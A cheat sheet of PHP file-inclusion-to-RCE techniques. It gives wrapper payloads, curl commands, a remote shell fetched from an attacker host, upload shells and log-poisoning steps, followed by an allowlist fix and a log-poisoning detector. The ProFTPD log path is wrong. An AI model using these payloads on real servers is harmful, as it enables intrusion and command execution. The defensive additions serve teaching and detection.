Introduction

Remote Code Execution (RCE) is a vulnerability that enables an attacker to execute arbitrary commands on a remote system. This exploit allows the attacker to manipulate or access data, disrupt system operations, or gain elevated privileges.

Remote Code Execution (RCE) Techniques

  1. Data Wrapper: Executes commands encoded directly in the URL.
    /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id

  2. Input Wrapper: Runs commands from data sent in a web request.
    curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://[DOMAIN_NAME]/index.php?language=php://input&cmd=whoami"

  3. Expect Wrapper: Executes commands using the Expect PHP wrapper.
    curl -s "http://[DOMAIN_NAME]/index.php?language=expect://id"

  4. Remote PHP Shell: Uses a remote PHP script to execute commands.
    /index.php?language=http://[IP-ADDRESS]:[LISTENING-PORT]/shell.php&cmd=id

  5. Malicious Image Upload: Executes code hidden within an image file.
    /index.php?language=./profile_images/shell.gif&cmd=id

  6. Malicious ZIP Upload: Runs PHP code hidden inside a ZIP file.
    /index.php?language=zip://shell.zip#shell.php&cmd=id

  7. Malicious PHAR Upload: Executes code from a PHP archive disguised as an image file.
    /index.php?language=phar://./profile_images/shell.jpg/shell.txt&cmd=id
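Every technique above relies on the same root cause: a request parameter reaching `include()` unchanged, so PHP's stream-wrapper layer accepts `data://`, `php://input`, `expect://`, `zip://`, `phar://` and remote URLs as file sources. The following is an added example, not code from the original page; it shows that vulnerable pattern beside a hardened version that treats the `language` parameter as a key into a fixed allowlist. The parameter name, the language map and the `languages/` directory are assumptions for illustration.

```php
<?php
// Added example (not from the original page): the vulnerable include pattern that
// the wrapper payloads target, beside a hardened version that resolves the
// "language" parameter through an allowlist instead of passing it to include().
declare(strict_types=1);

// Vulnerable pattern (assumed shape, for illustration only): the request
// parameter reaches include() unchanged, so every stream wrapper PHP knows
// about, and any remote URL when allow_url_include is On, becomes a source.
function includeLanguageVulnerable(string $language): void
{
    include $language;
}

// Hardened pattern: the parameter is only a key into a fixed map of files in a
// fixed directory; nothing user-controlled is ever interpreted as a path.
const LANGUAGE_FILES = [
    'en' => 'en.php',
    'es' => 'es.php',
    'de' => 'de.php',
];

function resolveLanguageFile(string $language, string $baseDir): ?string
{
    if (!array_key_exists($language, LANGUAGE_FILES)) {
        return null; // unknown key: no wrapper, no traversal, no include
    }
    $path = rtrim($baseDir, '/') . '/' . LANGUAGE_FILES[$language];
    // realpath() fails for missing files and collapses any ".." components;
    // the prefix check also catches a base directory that is a symlink elsewhere.
    $real     = realpath($path);
    $realBase = realpath($baseDir);
    if ($real === false || $realBase === false || strpos($real, $realBase . '/') !== 0) {
        return null;
    }
    return $real;
}

function includeLanguageHardened(string $language, string $baseDir): bool
{
    $file = resolveLanguageFile($language, $baseDir);
    if ($file === null) {
        http_response_code(400); // reject rather than fall back to a guessed path
        return false;
    }
    include $file;
    return true;
}

// Usage (assumed request shape matching the page's ?language=... examples):
$requested = $_GET['language'] ?? 'en';
includeLanguageHardened($requested, __DIR__ . '/languages');
```

The allowlist makes the wrapper question moot, since no attacker-supplied string is ever passed to `include()`. As a second layer, keep `allow_url_include` at its default of `Off` in `php.ini` so remote URL inclusion is refused even if a path check is bypassed, and do not install the `expect` extension on web servers unless it is genuinely needed.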

Target Logs for RCE Poisoning

Logs vulnerable to RCE poisoning often include user inputs or error information:

  1. Access Logs:
    /var/log/apache2/access.log, /var/log/httpd-access.log
  2. Error Logs:
    /var/log/apache2/error.log, /var/log/apache/error.log
  3. Logs that track authentication attempts.
    /var/log/auth.log
  4. Logs security details; used on systems with SELinux.
    /var/log/secure
  5. Logs for web applications.
    /var/www/logs/access_log
  6. Logs for the Webmin tool.
    /var/webmin/miniserv.log
  7. Logs from the Lighttpd web server.
    /var/log/lighttpd/access.log
  8. Logs from the ProFTPD server.
    /var/log/lighttpd/access.log

Step-by-Step: RCE via Log Poisoning

  1. Inject the Payload: This involves modifying the User-Agent string, other header fields, or the content of a request that you know will be logged.
    <?php system($_GET['cmd']); ?>

  2. Exploit LFI Vulnerability: Use an existing Local File Inclusion (LFI) vulnerability to include the poisoned log file in a web page's execution path.
    http://[DOMAIN_NAME]/index.php?file=../../../../var/log/apache2/access.log

  3. Execute the Payload: Add a command to the URL as a parameter if the payload is designed to be executed via a GET request.
    http://[RFI-URL]/vulnerable_page.php?file=../../../../var/log/apache2/access.log&cmd=whoami
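Both halves of the procedure leave a trace in the access log itself: the poisoning request carries a PHP open tag in a logged field, and the inclusion request names a `.log` file in a query parameter. The following is an added example, not code from the original page: a small PHP CLI detector that scans access-log lines for those two signatures. The log lines embedded below are constructed samples in Apache combined format, and the two regular expressions are heuristics chosen for this illustration.

```php
<?php
// Added example (not from the original page): scan web server access-log lines
// for the two signatures of RCE via log poisoning. Sample lines are constructed.
declare(strict_types=1);

// A PHP open tag in any logged field means that field was poisoned; a later
// LFI of the log file would hand the whole line to the interpreter.
const PHP_TAG_PATTERN = '/<\?(?:php\b|=|\s)/i';

// A query parameter whose value is a (possibly traversal-prefixed) path ending
// in .log is the inclusion step of the technique.
const LOG_INCLUDE_PATTERN = '/[?&][A-Za-z_]+=(?:\.\.\/)*[^&\s"]*\.log\b/';

function scanLogLine(int $lineNo, string $line): array
{
    $findings = [];
    if (preg_match(PHP_TAG_PATTERN, $line, $m, PREG_OFFSET_CAPTURE) === 1) {
        $findings[] = [
            'line'   => $lineNo,
            'reason' => 'php_tag_in_log',
            'offset' => $m[0][1],
        ];
    }
    if (preg_match(LOG_INCLUDE_PATTERN, $line, $m) === 1) {
        $findings[] = [
            'line'   => $lineNo,
            'reason' => 'log_file_in_include_parameter',
            'match'  => $m[0],
        ];
    }
    return $findings;
}

// Accepts any iterable of lines (an array, or SplFileObject for a real file).
function scanLog(iterable $lines): array
{
    $all = [];
    $n   = 0;
    foreach ($lines as $line) {
        $n++;
        foreach (scanLogLine($n, rtrim((string) $line, "\r\n")) as $f) {
            $all[] = $f;
        }
    }
    return $all;
}

// Constructed sample lines (Apache combined format): the third carries the
// page's payload in its User-Agent, the fourth includes the log through an LFI.
$sample = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /about.php HTTP/1.1" 200 1024 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=../../../../var/log/apache2/access.log&cmd=whoami HTTP/1.1" 200 2048 "-" "curl/8.0"',
];

// Usage: php detect_log_poisoning.php [/path/to/access.log]
$source = $argc > 1 ? new SplFileObject($argv[1]) : $sample;
foreach (scanLog($source) as $f) {
    echo json_encode($f), PHP_EOL;
}
```

Run against the embedded samples the script reports one `php_tag_in_log` finding for line 3 and one `log_file_in_include_parameter` finding for line 4; the first two lines produce nothing. The matches are only meaningful if the PHP process could actually read the log file, so the companion control is filesystem permissions: the web server user should not be able to read the paths listed under "Target Logs for RCE Poisoning", and the allowlisted include shown earlier removes the inclusion step entirely.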